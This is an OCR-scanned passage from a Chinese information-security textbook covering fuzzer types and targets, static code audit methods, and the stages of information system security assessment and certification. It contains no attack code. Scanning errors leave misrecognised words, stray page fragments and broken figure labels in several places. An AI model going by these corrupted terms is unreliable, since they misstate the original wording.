规范 ， 因 此 针对 性 更 强 ， 可 以 更 容易 地 深入 软件 内 部 逻辑 ， 检 测 深层 漏洞 ， 缺 点 是 由 于 
要 遵守 特定 的 格式 ， 降 低 了 一 部 分 随机 性 。 

也 不 同 于 基于 变异 的 模糊 器 ， 建 立 在 协议 或 文件 规范 基础 上 的 生成 模糊 器 技术 显得 
更 加 智能 ， 灵 活性 更 高 ， 但 需要 的 前 期 研究 量 更 大 。 

近年 来 出 现 的 模糊 器 大 多 基于 生成 技术 ， 包 括 PROTOS, Codenomicon, SPIKE, 
COMRaider、AxMan 等 ， 变 异 法 和 生成 法 都 利于 深入 代码 深层 逻辑 ， 挖 气 隐 藏 在 代码 底 
层 的 漏洞 。 

(4) 其 他 模糊 器 

以 上 是 根据 畸形 数据 的 生成 规则 将 模糊 器 分 为 随机 模糊 器 、 基 于 变异 的 模糊 器 以 及 
基于 生成 的 模糊 器 ;我 们 还 可 以 根据 被 测 目标 程序 的 不 同 将 其 划分 为 本 地 模糊 器 、 远 程 
模糊 器 。 

本 地 模糊 器 ， 顾 名 思 义 ， 这 类 模糊 器 的 测试 对 象 与 测试 工具 在 同一 个 机 器 上 ， 测 试 
工具 产生 的 测试 用 例 可 以 直接 影响 待 测 程序 的 输入 、 环 境 变 量 、 软 硬件 环境 等 。 

远程 模糊 器 特 指 测试 工具 位 于 本 地 而 测试 软件 位 于 远程 ， 需 要 借助 网 络 协议 才能 访 
问 。 远 程 模糊 器 的 目标 有 Web JIRA. Email 服务 、ftp 服务 、DNS 服务 等 。 远 端的 服务 
器 一 般 只 接受 符合 协议 规范 的 输入 ,测试 用 例 必须 完全 或 部 分 符合 相应 的 网 络 协议 规范 ， 
因此 构造 一 个 远程 模糊 器 大 部 分 的 工作 在 于 协议 的 学 习 和 解析 ， 根 据 网 络 协议 的 结构 不 
同 , 需要 相应 地 调整 对 其 进行 模糊 测试 的 方法 。 而 且 对 协议 中 数据 结构 元 素 了 解 得 越 多 ， 
就 越 容易 关注 那些 容易 引发 异常 条 件 的 协议 段 。 
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3. 模糊 测试 对 象 

目前 模糊 测试 对 象 已 经 渗透 到 安全 领域 的 各 个 方面 ， 出 现 了 很 多 针对 特定 测试 对 象 
的 测试 工具 。 测 试 对象 多 种 多 样 ， 难 以 区 分 。 我 们 针对 测试 对 象 进行 了 大 致 分 类 ， 主 要 
有 以 下 五 类 : 

(1) 环境 变量 和 参数 

测试 对 象 主要 是 命令 行 参数 和 环境 变量 。 现 在 的 主要 工具 有 iFuzz, 该 工具 采用 C 语 
言 开 发 ， 存 在 一 个 自动 处 理 目标 二 进 制 代码 的 引擎 ， 主 要 用 于 本 地 的 模糊 测试 。 

(2) Web 应 用 程序 和 服务 器 

Web 应 用 容易 受到 各 种 类 型 的 漏洞 攻击 ， 主 要 有 : 拒绝 服务 、 跨 站 漏洞 、SQL 注入 
漏洞 、 目 录 遍 历 、 缓 冲 区 溢出 、 远 程 代码 注入 等 。 当 前 的 主要 的 测试 工具 有 : SPIKE ft 
理 和 WebScarab。SPIKE 工具 是 基于 浏览 器 的 Web 模糊 器 。 工具 采用 代理 方法 捕获 Web 
请 求 ， 然 后 依据 一 定 的 规则 对 目标 Web 站 点 进行 测试 。WebScarab 工具 可 以 向 应 用 程 
序 的 参数 注入 模糊 值 。 另 外 同类 工具 还 有 SPI、Codenomicon Http、beSTORM 等 等 。 

(3) 文件 格式 

测试 对 象 是 针对 特定 的 文件 格式 ， 主 要 用 于 发 掘 客 户 端 文件 解析 漏洞 。 漏 洞 主要 包 
括 : 拒绝 服务 、 整 数 溢出 、 堆 栈 溢出 、 逻 辑 错 误 、 格 式 化 字符 串 。 当 前 主要 的 测试 工具 
有 : notSPIKEfile、SPIKEfile、FileFuzz。 

(4) 网 络 协议 

网 络 协议 的 模糊 测试 原理 是 通过 特定 的 Socket 形式 将 变异 或 者 生成 的 含有 错误 信 
息 的 数据 包 发 送 给 目标 程序 。 现 有 的 代表 工具 有 SPIKE 和 ProtoFuzz。 其 中 SPIKE 比较 
流行 ， 工 具 用 SPIKE 脚本 描述 目标 网 络 协议 ， 然 后 设置 模糊 器 根据 协议 开始 测试 。 另 
外 还 有 一 些 专门 针对 特定 协议 的 模糊 测试 工具 。 这 些 工具 包括 ircfuzz、dhcpfuzz、Infigo 
FTPStress 等 。 

(5) Web 浏览 

现在 的 Web 浏览 器 可 以 处 理 动态 htm 文件 、 表 单 、 脚 本 语言 等 多 种 目标 。 随 着 
Web 浏览 器 的 功能 日 益 增强 ， 其 存在 的 漏洞 也 越 来 越 多 。 目 前 应 用 最 广 的 是 针对 组 件 的 
测试 ， 尤 其 是 针对 Activex 组 件 。 代 表 工 具有 COMRaider 和 AxMan。 

4. 模糊 测试 的 优 缺 点 

与 代码 审计 、 静 态 分 析 、 模 型 检测 等 方法 比 ， 模 糊 测试 有 许多 优点 。 第 一 ， 模 糊 测 
试 不 需要 程序 的 源 代 码 即 可 发 现 问题 。 第 二 ， 模 糊 测试 不 受 限 于 被 测 系统 的 内 部 实现 细 
节 和 复杂 程度 。 例 如 ， 使 用 模糊 测试 可 以 不 用 关心 被 测 对 象 的 实现 语言 等 细节 。 第 三 ， 
使 用 模糊 测试 的 可 复 用 性 较 好 ， 一 个 测试 用 例 可 适用 于 多 种 产品 。 

模糊 测试 有 两 个 关键 的 操作 : 产生 畸形 数据 和 观察 应 用 程序 是 否 出 现 异 常 。 但 进行 
两 个 操作 时 存在 如 下 问题 : 

首先 ， 目 前 理论 上 还 未 出 现 能 成 熟 、 优 化 生成 畸形 数据 的 方式 。 现 有 的 许多 方法 可 


Bo 国 


KA 


信息 安全 工程 师 教程 


操作 性 不 强 ， 如 : 若 模糊 器 是 以 穷 举 方式 产生 各 种 可 能 的 畸形 协议 数据 组 合 ， 则 无 论 是 
产生 数据 的 时 间 还 是 对 被 测 目标 响应 的 检测 时 间 将 急剧 增长 ， 这 使 得 检测 费力 且 低 效 ; 
如 果 模 糊 器 是 以 随机 方式 产生 畸形 数据 ， 则 即使 发 现 问题 ， 也 很 难 精 确定 位 问题 所 在 。 

其 次 ， 需 要 有 一 个 监控 器 观察 应 用 程序 是 否 出 现 异常 。 但 是 其 使 用 什么 方法 来 判断 
被 测 目 标的 响应 是 否 异常 ， 这 些 异常 是 否 代表 发 现 漏洞 。 
7.4.3.2 ”代码 审计 

在 软件 开发 的 过 程 中 ， 代 码 审 计 工 具 帮 助 软件 开发 团队 快速 查找 、 定 位 、 修 复 和 管 
理 软 件 代码 安全 问题 。 应 用 静态 源 代 码 安全 扫描 的 主要 价值 在 于 能 够 快速 、 准 确 地 查找 、 
定位 和 修复 软件 代码 中 存在 的 安全 风险 ， 增 加 工具 投资 所 带 来 的 最 大 效益 ， 节 约 代码 安 
全 分 析 的 成 本 ， 最 终 开 发 安全 的 软件 。 

1， 代 码 审计 原理 

在 软件 开发 过 程 中 ， 静 态 代 码 分 析 是 软件 缺陷 检测 的 重要 方法 ， 是 指 在 不 执行 程序 
的 情况 下 ， 以 程序 源 代码 、 可 执行 文件 序列 或 高 级 语言 的 中 间 代 码 等 为 对 象 ， 通 过 预先 
定义 属性 规约 ， 自 动 地 检查 目标 代码 对 属性 规约 的 违反 情况 ， 进 而 检测 目标 代码 中 的 缺 
陷 。 与 以 软件 测试 为 主要 手段 的 动态 缺陷 检测 相 比 ， 静 态 分 析 不 需要 构建 测试 环境 、 不 
需要 占用 测试 资源 ， 并 且 能 够 在 软件 测试 阶段 之 前 检测 缺陷 。 因 此 ， 静 态 分 析 在 缺陷 检 
测 成 本 上 具有 优势 ， 且 静态 分 析 在 检测 编码 错误 造成 的 缺陷 方面 具有 显著 的 有 效 性 。 

静态 代码 分 析 的 应 用 已 经 非常 普遍 ， 如 从 微观 角度 对 程序 进行 安全 性 分 析 、 软 件 质 
量 分 析 、 程 序 效率 优化 ， 从 宏观 角度 对 程序 进行 架构 分 析 优 化 、 复 杂 性 分 析 ; 提供 一 个 
可 视 化 的 界面 ， 将 程序 中 的 各 种 关系 以 图 形 的 方式 展现 出 来 ， 为 阅读 程序 代码 提供 一 个 
较 好 的 工具 等 。 

在 OWASP 的 代码 审计 指南 中 ， 指 出 安全 代码 审计 是 一 个 为 了 验证 适当 的 安全 控制 
措施 是 否 存在 、 是 否 按照 设计 的 方式 进行 并 被 应 用 在 所 有 正确 的 地 方 而 审计 应 用 程序 源 
代码 的 过 程 。 代 码 审计 是 一 种 确保 应 用 程序 在 特定 环境 下 发 展 为 “自我 防御 型 ”的 方法 。 

也 能 够 确保 安全 应 用 程序 开发 人 员 遵 循 安全 发 展 技术 。 一 般 来 说 ， 在 应 用 程序 已 经 开 
发 了 一 个 正确 的 安全 代码 审计 之 后 ， 进 行 渗透 测试 不 应 当 再 发 现任 何 额外 的 与 成 型 代码 
相关 的 应 用 程序 漏洞 。 

静态 代码 审计 技术 是 实现 上 述 所 有 应 用 的 基础 。 从 抽象 层次 的 不 同 ， 可 以 将 分 析 技 
术 分 为 高 层次 分 析 技 术 和 低层 次 分 析 技 术 进 行 研究 。 高 层次 分 析 技 术 包括 组 件 结构 分 析 
和 配置 文件 分 析 ， 低 层次 分 析 技 术 包括 正则 表达 式 、 词 法 分 析 、 语 义 分 析 、 数 据 流 分 析 、 
控制 流 分 析 、 结 构 分 析 、 污 染 传播 分 析 、 别 名 分 析 等 。 
正则 表达 式 就 是 定义 查找 特定 字符 串 的 模式 ， 可 以 通过 查找 特定 的 字符 串 模 式 从 而 
判断 是 否 有 潜在 的 安全 问题 。 如 后 门 ， 通 常会 出 现 固定 他 地址 、 固 定 域名 、 固 定 手机 号 
码 、 固 定 端口 等 信息 。Linux 下 的 Grep 工具 、 高 级 文本 处 理工 具 如 Ultraedit、Java 语言 
等 都 支持 正则 表达 式 。 
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AST (Abstract Syntax Tree)， 抽 象 语法 树 是 程序 的 中 间 表 示 。 源 程序 的 最 初 表示 为 
字符 流 。 语 法 分 析 是 静态 代码 分 析 的 基础 ， 其 目的 是 对 源 代码 文件 进行 处 理 ， 从 中 抽取 
出 需要 的 程序 结构 信息 ， 并 将 这 些 结构 信息 以 特定 的 、 统 一 的 形式 组 织 到 抽象 语法 树 。 

词法 分 析 工 具有 ANTLR, GCC 前 端 等 。ANTLR 接受 三 类 语法 规范 一 一 语法 分 析 
器 (parsers), 词法 分 析 器 (lexers), 和 树 分 析 器 (tree-parsers, 也 叫 树 遍历 器 tree-walkers)。 
通过 编写 语法 文件 ， 定 义 词法 分 析 、 语 法 分 析 、 树 遍历 的 规则 ， 从 而 达到 分 析 源 文件 的 
目的 。 

数据 流 分 析 的 基础 是 控制 流 图， 其 目的 是 计算 在 程序 的 不 同 点 对 变量 的 不 同 赋值 信 
息 。 到 达 一 定 值 是 数据 流 分 析 的 重要 概念 ， 其 含义 是 到 达 某 语句 时 所 有 变量 的 可 能 赋值 
集合 。 由 于 控制 流 具 有 敏感 与 非 敏 感 琴 种 情况 ， 数 据 流 也 是 如 此 。 别 名 分 析 和 数据 流 分 
析 是 相关 的 ， 别 名 同样 有 IN 集合 、OUT 集合 、GEN 集合 、KILL 集合 ， 因 为 别名 集合 
在 到 达 不 同 的 语句 时 并 不 一 样 。 

2. 代码 审计 流程 

安全 代码 审计 的 第 一 步 就 是 对 每 一 个 源 代码 文件 的 所 有 者 的 分 配 权限 、 相 关 所 有 文 
件 等 建立 一 个 数据 库 。 在 这 一 阶段 ， 不 能 遗漏 任何 待 评审 的 代码 。 许 多 源 代码 库 并 不 会 
存储 源 代码 文件 “Owner”。 在 这 种 情况 下 ,通常 可 以 使 用 最 近 一 次 更 新 过 该 文件 的 用 户 
面 进行 更 新 。 在 数据 库 中 创建 一 个 包含 文件 名 、 文 件 属 主 、 优 先 级 、 评 审 者 、 评 审结 果 
及 评论 的 表格 。 

下 一 步 就 是 明确 评审 优先 级 。 多 数 标 记 应 由 威胁 模型 驱动 。 威 胁 模型 所 识别 出 的 最 
高 风险 组 件 就 是 待 评审 的 高 优先 级 代码 段 ， 可 以 执行 一 些 简单 的 规则 来 明确 优先 级 。 代 
码 审计 应 当 也 能 够 覆盖 用 于 为 其 他 使 用 人 员 讲 解 的 示例 代码 。 相 对 于 需要 交付 的 代码 来 
说 ， 对 示例 代码 的 优先 级 进行 定 级 虽然 有 些 困 难 ， 但 一 个 好 的 方法 就 是 考虑 用 户 将 会 以 
什么 方式 使 用 该 示例 代码 。 如 果 是 模板 代码 在 用 于 生产 环境 时 需要 进行 轻微 的 修改 ， 而 
且 如 果 符 合 前 文件 所 述 的 清单 中 优先 级 为 1 的 标准 ， 那 么 该 示例 代码 毫 无 疑问 优先 级 
为 1。 

需要 注意 的 是 ， 属 主 并 不 参与 审计 代码 ， 但 其 可 以 指定 某 人 对 代码 进行 审计 。 其 中 
一 种 最 佳 方案 是 只 有 两 个 属 主 交 换 他 们 的 源 代码 文件 并 互相 交叉 审计 。 有 时 候 可 能 仍 需 
要 平衡 代码 审计 人 员 之 间 的 工作 量 ， 如 果 一 个 审计 者 完成 了 已 分 配 代 码 审计 ， 则 应 当 帮 
助 其 他 人 员 进 行 审计 工作 。 

紧 接 着 ， 必 须 建立 一 个 囊括 产品 中 所 有 可 执行 文件 〈.exe 文件 、 动 态 链接 库 、COM 
组 件 、 汇 编程 序 、 脚 本 文件 等 ) 的 清单 ， 并 在 此 基础 之 上 为 每 一 个 组 件 分 配 一 个 测试 属 
主 。 再 次 创建 包含 可 执行 文件 名 称 、 测 试 属 主 、 优 先 级 、 验 证 和 评论 的 数据 表 。 该 任务 
的 目的 是 使 得 测试 人 员 对 产品 中 高 风险 的 可 执行 文件 进行 验证 ， 一 次 成 功 的 验证 意味 着 
测试 团队 必须 在 意见 上 达成 一 致 。 
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在 之 后 的 分 析 过 程 中 ， 基 本 的 分 析 流程 如 图 7-43 所 示 。 


源 代 码 | | 规则 文件 
预 处 理 | | 规则 分 析 


不 需要 进一步 分 析 安全 规则 


控制 流 分 析 


数据 流 分 析 


安全 分 析 调 度 


i i i 
分 析 器 1 分 线 器 2| e 分 析 器 


| 分 析 结 果 管 理 


分 析 结 构 输出 


图 7-43 ”代码 审计 分 析 流 程 


3. 代码 审计 的 主要 方法 

如 果 想 要 在 程序 中 寻找 漏洞 ， 或 想 找 出 目标 程序 中 所 有 的 漏洞 ， 需 要 有 明确 的 方法 
论 来 做 指导 。 方 法 论 的 选择 视 目标 程序 和 要 寻找 的 漏洞 而 定 。 从 方法 论 的 角度 出 发 ， 宏 
观 来 看 代码 审计 的 主要 方法 可 以 分 为 自 项 向 下 、 自 底 向 上 和 两 者 相 结 合 的 三 种 方法 。 

采用 自 项 向 下 (明确 的 ) 的 方法 ,审计 者 不 必 深 入 了 解 目标 程序 。 优 点 是 效率 较 高 ， 
但 缺点 是 可 能 会 遗漏 那些 需要 深入 了 解 目标 程序 上 下 文才 能 发 现 的 漏洞 、 跨 越 多 段 代 码 
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的 漏洞 等 。 该 方法 比较 适合 寻找 那些 只 读 一 行 代码 就 能 识别 的 漏洞 。 

采用 自 底 向 上 的 方法 ， 审 计 者 需要 阅读 大 部 分 的 源码 来 了 解 程序 的 内 部 工作 机 理 。 
一 般 是 从 main 函数 开始 ， 从 进入 点 一 路 读 到 退出 点 ， 从 而 对 程序 有 一 个 全 面 的 了 解 。 会 
耗费 大 量 时 间 ， 但 由 于 全 面 地 了 解 了 程序 有 可 能 会 发 现 更 多 、 更 复杂 的 漏洞 。 

通常 ， 任 何 代码 库 都 有 死 代码 (运行 过 程 中 基本 或 完全 不 会 被 执行 的 代码 )， 并 占 
有 相当 大 的 比例 。 在 死 代码 中 寻找 漏洞 是 劳 而 无 功 的 ， 因 为 它们 几乎 不 会 被 触发 。 因 此 
审计 那些 最 有 可 能 包含 安全 问题 而 又 可 以 被 利用 的 代码 段 会 更 有 意义 。 结 合法 中 ， 审 计 
者 先 通过 输入 定义 的 攻击 者 来 定位 可 疑 的 代码 ,然后 把 大 部 分 精力 放 在 小 范围 代码 段 上 。 
当然 ， 全 面 了 解 代码 的 关键 部 分 也 非常 有 用 。 如 果 不 知道 正在 审计 的 代码 段 在 做 什么 或 
它 适合 于 程序 的 哪个 地 方 ， 那 就 应 当 了 解 它 的 上 下 文 情况 。 

在 以 方法 论 的 角度 了 解 当 前 代码 审计 的 三 种 方法 之 后 ， 从 具体 的 实施 方案 来 看 ， 目 
前 代码 静态 分 析 采 用 的 方法 主要 有 模式 匹配 、 定 理 证 明 、 模 型 检测 等 。 

(1) 模式 匹配 

模式 匹配 是 静态 分 析 最 早 采 用 的 方法 ， 主 要 步骤 是 依据 统计 及 经 验 ， 定 义 和 抽 象 缺 
陷 及 错误 特征 ， 对 目标 代码 采用 行走 检查 、 模 式 匹 配 等 方法 过 滤 已 知 缺陷 。 如 针对 C 语 
言 的 LCLintl， 针 对 Java 语言 的 FindBugs、JLint 等 。FindBugs 共 定 义 了 不 良 实现 方法 、 
正确 性 、 实 验 性 、 国 际 化 标准 、 亚 意 代 码 漏洞 、 多 线程 正确 性 、 性 能 、 安 全 等 几 大 类 缺 
陷 ， 具 体 有 300 多 种 缺陷 模式 ， 然 后 结合 数据 流 分 析 技 术 ， 检 测 目标 代码 中 的 缺陷 2。 
JLint 的 特点 是 基于 数据 流 分 析 和 内 存 使 用 情况 ,检测 程序 中 可 能 存在 的 死 锁 情况 ， 在 句 
法 检查 方面 和 FindBugs 具有 相同 性 ,可 以 发 现 无 效 的 指针 、 死 锁 、 数 组 越界 、 除 零 错 误 、 
字符 串 相等 判断 、 子 类 重 写 错误 等 。 

但 是 ,模式 匹配 算法 存在 的 根本 性 问题 是 模式 固定 上 且 扩展 困难 ， 虽 然 FindBugs 等 工 
具 具 有 一 定 的 扩展 性 ， 允 许 自 定义 缺陷 模式 ， 但 是 自 定义 的 缺陷 模式 仍然 在 编码 规则 、 
句法 错误 之 类 的 缺陷 范围 之 内 ， 具 有 局 限 性 。 考 虑 到 这 种 不 足 ， 后 来 的 研究 中 基于 模式 
匹配 的 检测 方法 更 多 应 用 于 针对 性 的 缺陷 检测 ， 如 缓冲 区 溢出 、 程 序 不 可 达 路 径 、 程 序 
忽视 条 件 等 ， 以 及 Web 程序 里 的 SQL 注入 、 跨 站 脚本 攻击 等 。 将 缓冲 区 是 做 一 个 整数 
对 ， 分 别 为 分 配 的 内 存 大 小 和 正在 使 用 的 字 节 数 ， 然 后 规定 分 配 的 内 存 大 小 至 少 和 正在 
使 用 的 字 节 数 一 样 大 ， 以 此 来 检测 缓冲 区 溢出 。 分 析 得 出 大 部 分 的 程序 不 可 达 路 径 表 现 
出 相同 的 特征 ， 而 这 些 特征 是 由 同一 /补充 决策 、 相 互 -专用 决策 、 检 测 后 执行 、 依 据 标 
签 循环 等 四 种 模式 引起 的 ， 通 过 识别 源 代 码 中 的 特征 ， 能 够 精确 检测 程序 不 可 达 路 径 。 

基于 模式 匹配 方法 的 静态 检测 在 检测 效率 上 具有 优势 ， 但 是 却 导致 了 较 高 的 误 报 率 
和 漏 报 率 ， 同 时 ， 不 同 检测 依据 的 模式 库 不 一 样 ， 也 导致 了 不 同 检测 工具 的 检测 结果 存 
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在 较 大 出 入 ， 检 测 结果 的 精确 度 不 高 ， 这 在 软件 质量 要 求 越 来 越 高 的 发 展 中 显然 是 不 能 
满足 需要 。 模 式 匹 配方 法 的 局 限 性 其 实 可 以 归结 为 模式 定义 本 身 的 不 足 ， 同 时 也 决定 了 
模式 匹配 方法 只 能 用 来 检测 具有 固定 模式 的 缺陷 ， 不 具有 很 好 的 普遍 性 。 

(2) 定理 证 明 

定理 证 明 是 代码 形式 化 验证 中 的 重要 技术 ， 也 属于 静态 代码 分 析 的 范畴 。 定 理 证 明 
技术 是 将 软件 系统 和 性 质 都 用 网 辑 方 法 来 规约 ， 通 过 基于 公理 和 推理 规则 组 成 的 形式 系 
统 ， 以 定理 证 明 的 方法 来 证 明 软件 系统 是 否 具备 所 期 望 的 关键 性 质 。 从 原理 上 讲 ， 定 理 
证 明 方法 非常 强大 ， 能 证 明 各 种 程序 的 正确 性 。 基 于 定理 证 明 方 法 的 程序 缺陷 检测 也 有 
很 多 成 果 。 轻 量 级 定理 证 明 ， 以 灵活 和 高 效 的 方式 调试 和 验证 需要 管理 指针 ， 减 少 缺陷 
的 来 源 。ESC/Java5 基于 定理 证 明 方法 ， 首 先 给 开发 者 提供 了 用 于 描述 验证 条 件 的 简单 
语言 ， 然 后 以 此 验证 条 件 为 准则 ， 在 运行 时 层次 检测 缺陷 存在 。 在 这 项 研究 中 ， 缺 陷 检 
测 的 实施 离 不 开 编程 人 员 的 参与 ， 自 动 化 程度 不 高 ， 这 也 是 定理 证 明 的 不 足 之 处 。 在 
ESC/Java 的 基础 上 ， 静 态 检测 器 改进 了 自动 化 程度 ， 结 合 了 检测 的 精确 性 以 及 可 扩展 性 
可 以 在 上 千 行 规模 的 开源 程序 中 找 出 了 很 多 缺陷 ， 并 且 误 报 率 很 低 。 

从 上 述 研究 可 以 发 现 ， 定 理 证 明 虽 然 是 一 种 强大 的 正确 性 证 明 方 法 ， 但 定理 证 明 的 
最 大 问题 在 于 需要 大 量 的 人 为 辅助 ， 自 动 化 程度 低 。 后 来 的 研究 中 自动 化 程度 的 提高 也 
以 牺牲 检测 范围 和 检测 精度 为 代价 ， 可 以 片面 理解 为 对 已 知 缺 陷 模 式 进行 形式 化 转换 成 
验证 条 件 ， 这 种 方法 并 不 可 取 。 同 时 ， 定 理 证 明 还 需要 用 户 具 有 经 验 和 专业 知识 ， 比 如 
要 用 户 给 出 循环 不 变 式 等 。 另 外 ， 对 于 一 个 不 算 大 的 确定 系统 的 证 明 可 能 会 极 长 ， 而 且 
产生 的 证 明 可 能 难以 理解 。 定 理 证 明 的 使 用 和 推广 还 存在 很 大 限制 。 

G) 模型 检测 

模型 检测 是 近年 来 研究 的 热点 。 该 技术 是 通过 搜索 待 验 证 软件 系统 模型 的 有 穷 状态 
空间 来 检验 系统 的 行为 是 否 具备 预期 性 质 的 一 种 有 穷 状态 系统 自动 验证 技术 。 

在 模型 检测 中 ， 系 统 用 有 穷 状态 模型 建 模 ; 其 性 质 规约 则 通常 是 时 序 逻 辑 或 模 态 逻 
HAR, 也 可 以 用 自动 机 语言 描述 ; 通过 有 效 的 搜索 来 检验 有 穷 状 态 模 型 是 否 满足 规约 ， 
如 果 不 满 足 ， 给 出 使 性 质 公式 为 假 的 系统 行为 轨迹 。 目 前 ， 模 型 检测 方法 在 代码 的 形式 
化 验证 及 缺陷 检测 方面 都 具有 非常 多 的 研究 成 果 ， 这 依赖 于 模型 检测 禾 盖 面 广 、 自 动 化 
程度 高 的 优势 ， 但 同时 也 可 以 发 现 模型 检测 的 应 用 同样 也 存在 多 种 问题 ， 如 针对 大 规模 
代码 检测 过 程 会 产生 状态 约 简 问题 、 状 态 约 简 后 的 检测 精确 度 保持 问题 等 ， 这 些 都 需要 
结合 代码 检测 的 特点 做 进一步 的 研究 。 

模型 检测 一 开始 是 纯粹 的 静态 分 析 方法 ， 后 续 的 研究 中 针对 模型 检测 容易 产生 状态 
爆炸 等 问题 ， 已 经 与 程序 动态 切片 、 符 号 执行 等 结合 起 来 ， 一 方面 利用 了 模型 检测 覆盖 
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面 广 、 自 动 化 程度 高 等 优势 ， 另 一 方面 又 结合 程序 本 身 的 特征 进行 了 有 效 的 状态 约 简 ， 
在 缺陷 监测 方面 取得 了 不 错 的 成 果 。 


744 信息 系统 安全 测评 程序 


7.4.4.1 测评 流程 

信息 系统 安全 测评 流程 ， 是 通过 制定 通用 的 测评 工作 程序 ， 将 测评 过 程 阶段 化 ， 各 
阶段 内 工作 模式 化 ， 参 与 者 角色 和 任务 明确 化 ， 使 针对 各 类 信息 系统 的 测评 活动 都 能 依 
据 标准 化 的 程式 规范 实施 。 

信息 系统 安全 测评 由 三 个 阶段 组 成 : @ 安全 评估 阶段 ，@ 安全 认证 阶段 ; © 持 
续 监 督 阶 段 。 图 7-44 简要 地 描述 了 信息 系统 安全 认证 中 的 每 个 阶段 及 其 任务 。 


安全 评估 阶段 


认证 监督 阶段 


图 7-44 信息 系统 安全 测评 流程 


7.4.4.2 ”安全 评估 阶段 

信息 系统 安全 评估 阶段 按 工 作 内 容 又 划分 几 个 子 阶段 : 静态 评估 阶段 、 现 场 检测 阶 
段 、 综 合 安全 评估 阶段 。 

1. 静态 评估 阶段 

在 静态 评估 阶段 信息 系统 资产 所 有 者 提出 申请 ， 与 系统 评估 方 签署 协议 ， 所 有 者 提 
交 文档 ， 所 有 者 为 主 提出 评估 对 象 的 保护 轮廓 。 评 估 项 目 组 成 员 首先 要 对 申请 方 提供 的 
材料 进行 技术 审查 ， 并 将 审查 中 发 现 的 主要 问题 及 时 反馈 给 申请 单位 ， 同 时 提出 改进 建 
议 。 评 估 者 与 所 有 者 确定 系统 评估 范围 和 边界 、 理 解 评估 对 象 的 保护 轮廓 、 了 解 所 有 者 
提供 的 信息 系统 结构 、 系 统 风险 和 对 策 、 系 统 安全 需求 等 先 验 知识 ， 以 评估 者 为 主 制定 
评估 对 象 的 评估 目标 ， 制 定 评估 方案 和 计划 。 计 划 和 方案 制定 完成 后 ， 第 一 阶段 工作 
结束 。 
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2. 现场 检测 阶段 

信息 安全 分 析 与 测试 的 目的 是 确定 信息 系统 所 处 的 安全 状态 ， 为 便于 信息 系统 安全 
状况 的 评估 和 确定 改进 的 方法 和 措施 将 安全 分 析 分 为 技术 安全 、 管 理 安全 和 过 程 安全 。 
信息 安全 的 分 析 和 测试 是 交替 进行 、 相 互 结合 和 补充 。 

在 现场 检测 阶段 ， 评 估 项 目 组 前 往 信 息 系 统 运行 现场 进行 实地 检测 。 正 式 开始 检测 
之 前 ， 评 估 项 目 组 会 同 申请 单位 召集 信息 安全 高 层 主管 人 员 、 系 统 日 常安 全 管理 人 员 以 
及 系统 开发 和 集成 人 员 召 开 项 目 启动 会 。 会 上 ， 评 估 项 目 组 向 申请 单位 介绍 评估 项 目 小 
组 成 员 ， 简 要 说 明 评 估 工 作 计划 和 评估 方案 ， 征 询 有 关 方 面 意 见 ， 修 改 并 最 终 确定 工作 
计划 和 方案 ， 同 时 协商 落实 申请 单位 方 现场 检测 工作 协调 人 员 ， 并 要 求 申 请 单位 提供 必 
要 的 工作 环境 。 
准备 、 协 商工 作 结束 后 , 项 目 组 将 正式 开始 实施 现场 检测 。 检 测 内 容 包 括 技术 测试 、 
管理 和 安全 运行 情况 核查 三 部 分 。 现 场 检 测 阶 段 收集 和 产生 的 所 有 检测 数据 都 将 得 到 严 
格 保护 。 

现场 检测 工作 结束 之 前 ， 项 目 组 会 同 申请 单位 信息 安全 高 层 主管 人 员 召 开 一 次 项 目 
总 结 会 ， 对 现场 检测 工作 进行 总 结 ， 并 再 次 确认 现场 检测 结果 。 至 此 ， 现 场 检测 正式 
结束 。 

在 本 阶段 ， 将 制定 具体 的 测评 工作 计划 和 测评 方案 ， 并 与 用 户 协商 达成 一 致意 见 。 

3. 综合 安全 评估 阶段 

现场 检测 工作 结束 后 ， 项 目 组 对 检测 数据 和 结果 进行 分 析 ， 完 成 《信息 系统 安全 现 
场 核查 报告 》 及 《信息 系统 安全 测试 报告 》。 报告 将 对 现场 检测 结果 进行 详细 总 结 ， 指 出 
管理 、 运 行 和 技术 上 存在 的 问题 ， 并 提出 相应 的 整改 建议 。 

为 综合 评估 系统 安全 的 保障 能 力 ， 项 目 组 将 汇总 《信息 系统 安全 现场 核查 报告 》 以 
及 《信息 系统 安全 测试 报告 》 中 管理 、 运 行 、 技 术 检测 结果 ， 进 行进 一 步 分 析 与 评估 ， 
确定 信息 系统 安全 保障 能 力 级 别 ， 并 完成 《信息 系统 安全 综合 评估 报告 》。 本 阶段 以 《 信 
息 系 统 安全 综合 评估 报告 》 的 完成 为 结束 标志 。 
7.4.4.3 安全 认证 阶段 

通过 安全 评估 的 信息 系统 将 进入 安全 认证 阶段 ,如 图 7-45 所 示 。 首先 信息 系统 需要 
试 运行 6 个 月 ， 如 果 系 统 在 此 期 间 内 未 出 现 重 大 安全 事故 和 变更 ， 评 估 机 构 将 派出 工作 
人 员 到 系统 运行 现场 对 系统 安全 状况 进行 复审 ， 并 向 认证 委员 会 出 示 复 审 报告 。 认 证 委 
员 会 依据 前 面 各 个 阶段 报告 做 出 认证 决定 ， 认 证 机 构 将 对 通过 认证 的 信息 系统 签发 认证 
WEB. 证 书 有 效 期 内 ,认证 机 构 每 年 还 要 对 通过 认证 的 信息 系统 的 安全 性 进行 抽样 检查 ， 
车 合格 ， 维 持 认证 ， 否 则 取消 认证 。 
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系统 试 运行 
六 个 月 


信息 系统 安全 性 
综合 评估 报告 


> 3 


A 复审 证 后 监督 


1. 复审 核查 2. 抽样 检查 


次 市 


图 7-45 ”安全 认证 阶段 


7.4.4.4 ”认证 监督 阶段 

本 阶段 的 目的 是 认证 中 心 监督 信息 系统 中 的 安全 保证 措施 的 实施 情况 ， 并 在 发 生 了 
有 可 能 影响 到 信息 系统 安全 的 变更 时 告知 信息 系统 主管 部 门 代表 。 

认证 中 心 从 以 下 三 方面 测试 并 确认 信息 系统 安全 保证 措施 在 实际 运行 中 的 持续 有 
效 性 : 
1. 配置 管理 和 控制 

需要 信息 系统 的 所 有 者 持续 记录 信息 系统 中 的 发 生变 更 ， 认 证 中 心 将 定期 评价 并 确 
认 变更 为 信息 系统 安全 带 来 的 影响 。 

2. 对 安全 保证 措施 的 监督 检查 

认证 中 心 将 对 安全 保证 措施 的 实施 情况 进行 现场 监督 ， 检 查 信息 系统 运行 环境 、 操 
作 程 序 、 人 员 控 制 以 及 物理 安全 等 保证 措施 的 实施 情况 ， 确 定 在 信息 系统 运行 阶段 没有 
引入 任何 不 可 接受 的 风险 。 

3. 认证 监督 决定 

